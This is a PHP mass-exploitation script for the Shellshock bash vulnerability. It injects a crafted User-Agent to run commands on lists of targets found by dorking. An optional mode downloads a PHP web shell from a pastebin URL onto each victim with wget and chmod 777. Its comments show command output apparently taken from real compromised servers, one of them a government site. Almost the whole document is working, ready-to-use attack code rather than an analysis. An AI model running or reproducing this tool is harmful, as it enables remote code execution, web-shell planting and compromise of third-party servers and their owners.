/xplSHELLSHOCK.php

<?php/* # SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL # AUTOR: Cleiton Pinheiro / Nick: googleINURL # Email: inurlbr@gmail.com # Blog: http://blog.inurl.com.br # Twitter: https://twitter.com/googleinurl # Fanpage: https://fb.com/InurlBrasil # Pastebin http://pastebin.com/u/Googleinurl # GIT: https://github.com/googleinurl # PSS: http://packetstormsecurity.com/user/googleinurl # YOUTUBE: http://youtube.com/c/INURLBrasil # PLUS: http://google.com/+INURLBrasil -------------------------------------------------------------------------------------- # DESCRIPTION - VULNERABILITY(SHELLSHOCK) - CVE-2014-6271, CVE-2014-6277, - CVE-2014-6278, CVE-2014-7169, - CVE-2014-7186, CVE-2014-7187 Is a vulnerability in GNU's bash shell that gives attackers access to run remote commands on a vulnerable system. -------------------------------------------------------------------------------------- # DESCRIPTION - TOOL The tool inject a malicious user agent that allows exploring the vulnerabildiade sheelshock running server-side commands. -------------------------------------------------------------------------------------- # EXECUTION -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w OUTPUT VULN: SHELLSHOCK_vull.txt -------------------------------------------------------------------------------------- # EXPLOIT MASS USE SCANNER INURLBR ./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd" -------------------------------------------------------------------------------------- # Exemples: php xpl.php -t 'http://www.camnpalxxx.com.br/cgi-bin/login.sh' -c pwd CMD: Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504 @ 2.00GHz GenuineIntel GNU/Linux uid=1000(icone) gid=100(users) groups=100(users) /ico/camnpal/cgi-bin END_CMD: php xpl.php -t 'http://www.bnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd CMD: Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster) /mnt/volume1/sitio/data/catalogos/cgi-bin END_CMD: -------------------------------------------------------------------------------------- */error_reporting(1);set_time_limit(0);ini_set('display_errors', 1);ini_set('max_execution_time', 0);ini_set('allow_url_fopen', 1);ob_implicit_flush(true);ob_end_flush();$op_ = getopt('f:c:t:w::', array('help::'));echo "\n\t[-] [Exploit]: Xpl SHELLSHOCK Ch3ck / INURL - BRASIL\n\t[?] [help]: --help\n\n";$menu = " -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w\n";echo isset($op_['help']) ? $menu : NULL;$cmd = not_isnull_empty($op_['c']) ? "uname -a && id && {$op_['c']}" : exit("\n\t[x] [ERRO] DEFINE COMMAND!\n");$wget = "wget http://pastebin.com/raw.php?i=UD9UwaNd -O inurl.php; chmod 777 inurl.php";$params['host'] = not_isnull_empty($op_['t']) ? $op_['t'] : NULL;$params['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$cmd}; echo END_CMD:;\"";$params['payload'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$wget}; echo END_CMD:;\"";$params['file'] = not_isnull_empty($op_['f']) ? $op_['f'] : NULL;$params['line'] = "--------------------------------------------------------------";not_isnull_empty($params['host']) && not_isnull_empty($params['file']) ? exit("\n\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;echo "\t[+] [COMMAND]: {$cmd}\n";function __plus() { ob_flush(); flush();}function not_isnull_empty($valor = NULL) { RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;}function __request($params, $op = 0) { $objcurl = curl_init($params['host']); curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($objcurl, CURLOPT_TIMEOUT, 5); curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1); curl_setopt($objcurl, CURLOPT_USERAGENT, $params['user_agent_xpl']); $info['corpo'] = curl_exec($objcurl) . __plus(); $erro = curl_error($objcurl); not_isnull_empty($erro) ? print("\t[x] [ERROR]: {$erro}\n") : NULL; $_[0] = explode("\n", $info['corpo']); $_[1] = curl_getinfo($objcurl); if ($op != 0) { return $_; } if ($_[0][0] == '99887766555') { foreach ($_[0] as $valores) { $__.= $valores . "\n"; if ($valores == 'END_CMD:') break; } $__ = str_replace('99887766555', '', $__); file_put_contents('SHELLSHOCK_vull.txt', "{$params['host']}{$__}{$params['line']}\n", FILE_APPEND); echo "\t[!] VULN SHELLSHOCK\n\t[!] OUTPUT SERVER:: {$__}"; return TRUE; } else { echo "\t[x] [NOT VULN]\n"; } curl_close($objcurl) . __plus(); return FALSE;}function __listTarget($file) { $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file'])))); echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n"; foreach ($tgt_ as $url) { echo "\n\t[+] [INFO] SCANNING : {$url} \n"; __plus(); $file['host'] = $url; __request($file) . __plus(); }}if (__request($params)) { $params['user_agent_xpl'] = $params['payload']; $h_ = parse_url($params['host']); $h__ = "http://{$h_['host']}{$h_['path']}/inurl.php?0=uname%20-a%20%26%26%20ls%20-la"; if (isset($op_['w'])) { echo "\t[!] UPLOAD SHELL_SCRIPT!\n"; $__ = __request($params, 1); if ($__[0][0] == '99887766555') { echo "\t[!] PAYLOAD: {$wget}\n"; echo "\t[!] INCTION PAYLOAD SUCCESS\n"; $params['host'] = $h__; $cmd = __request($params, 1); if ($cmd['http_code'] == 200) { echo "\t[!] SUCCESSFULLY UPLOADED FILE {$h__}\n"; echo "\t[!] opening auxiliary window...\n"; system("sudo xterm -geometry 134x50 -e curl -v '$h__' > /dev/null &", $dados); } else { echo "\t[X] FAILURE TO FILE CREATION\n"; } } } echo "\t" . $params['line'] . "\n";}